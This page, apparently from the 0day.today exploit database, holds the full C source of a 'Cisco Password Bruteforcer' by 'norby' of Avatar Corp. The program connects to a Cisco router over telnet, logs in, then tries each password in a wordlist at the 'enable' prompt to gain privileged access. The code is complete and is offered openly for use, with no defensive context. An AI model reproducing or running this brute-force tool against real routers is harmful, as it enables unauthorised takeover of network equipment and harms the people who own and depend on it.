0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco Password Bruteforcer Exploit
[==================================
Cisco Password Bruteforcer Exploit
==================================
/*
.: free source :. .: coded 4 Avatar Corp :.
enabler.
cisco internal bruteforcer.
coder - norby
concept - anyone
this program just logs into a CISCO router and tries a list of
passes looking for the enable one.
it works in password-only CISCO as well in login-pass ones and
has been succesfully tested on many 2600 and a few 12008.
the prog's concept [bruteforcing a router for gaining enable access]
is quite simple ...how amazing I haven't seen similar progs before!
anti eleet&0day force ;)
anyway... information wants to be free :)
sciao belli
saluti a berserker mandarine, acidcrash
beho x la traduzione :)
norby
saluti a *lei*, saluti a gabriella che a capodanno
non ha voluto lasciare il ragazzo x fare un bambino con me ;)
saluti a tutti gli avatar, a sandman, a tutte le diecimila
persone che conosco
any
saluti a Acida, storm\, Raid
contact` norby - staff22@infinito.it anyone - anyone@anyone.org
www.avatarcorp.org
neural collapse _ i truly hope in this project
v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery
(very simple feature)
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"
struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;
int n,x;
char **password;
char resolve(char *inputhost) {
int a,b,c,d;
if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
hp = gethostbyname(inputhost);
if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
(unsigned char)hp->h_addr_list[0][1],
(unsigned char)hp->h_addr_list[0][2],
(unsigned char)hp->h_addr_list[0][3]);
}
else { strncpy(host,inputhost,100); }
}
int sock(char *hostoresolve,int port) {
int err;
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }
addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);
err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
}
int banner() {
printf("\n%s enabler.\n", BOX);
printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
printf("%s coded by norby\n", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }
void sig() {
if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
printf("\n\033[0m"); exit(0);
}
int login(char *login, char *pass) {
char *input = malloc(4000);
int reqlogin;
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,"ogin:")||strstr(input,"sername:")) {
if(!strcmp(login,"n0login")) {
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
exit(0);
}
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
}
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
bzero(input,4000);
}
if(reqlogin==1) {
write(sock_stat,login,strlen(login));
write(sock_stat,"\r\n",2);
while(read(sock_stat,input,4000)>0) {
if(strstr(input,"assword")); { break; }
}
}
write(sock_stat,pass,strlen(pass));
write(sock_stat,"\r\n",2);
sleep(2);
bzero(input,4000);
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
/* if(strstr(input,"assword:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}*/
if(strstr(input,"sername:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}
bzero(input,4000);
}
}
int loadwordlist(char *list) {
FILE *passlist;
char buf[32], fake;
int i,z;
if ((passlist = fopen(list, "r")) == NULL) {
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
if(password == NULL) {
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_SET);
while (!feof(passlist)) {
fgets(buf, 32, passlist);
if (buf[0] == '#' || buf[0] == '\n') continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
password[x] = malloc(32);
strcpy(password[x], buf);
memset(buf, 0, 32);
x++;
}
password[x] = 0x0;
fclose(passlist);
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }
}
int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)
char *input = malloc(100);
int N;
bzero(input,100);
write(sock_stat,"enable",6);
write(sock_stat,"\r\n",2);
while(1) {
while(read(sock_stat,input,100)>0) {
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
if(n+1==x) break;
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
bzero(input,100);
}
if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }
if(strstr(input,"assword:")) {
write(sock_stat,password[n],strlen(password[n]));
write(sock_stat,"\r\n",2);
n++;
bzero(input,100);
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
continue;
}
if(strstr(input,">")) {
write(sock_stat,"enable\r\n",8); bzero(input,100);
}
}
}
int main(int argc, char *argv[]) {
int port;
signal(SIGINT, sig);
banner();
if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }
if(!strcmp(argv[2],"-u")) {
if(argc==6) { port=atoi("23"); }
else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
// c'ho cosetta nella testa :?-- Corretto :)
printf("%s\n",BOX);
loadwordlist(argv[5]);
resolve(argv[1]);
sock(host, port);
login(argv[3],argv[4]);
brute();
}
else {
if(argc==4) { port=atoi("23"); }
else { port=atoi(argv[4]); }
printf("%s\n",BOX);
loadwordlist(argv[3]);
resolve(argv[1]);
sock(host, port);
login("n0login",argv[2]);
brute();
}
}
# 0day.today [2024-11-15] #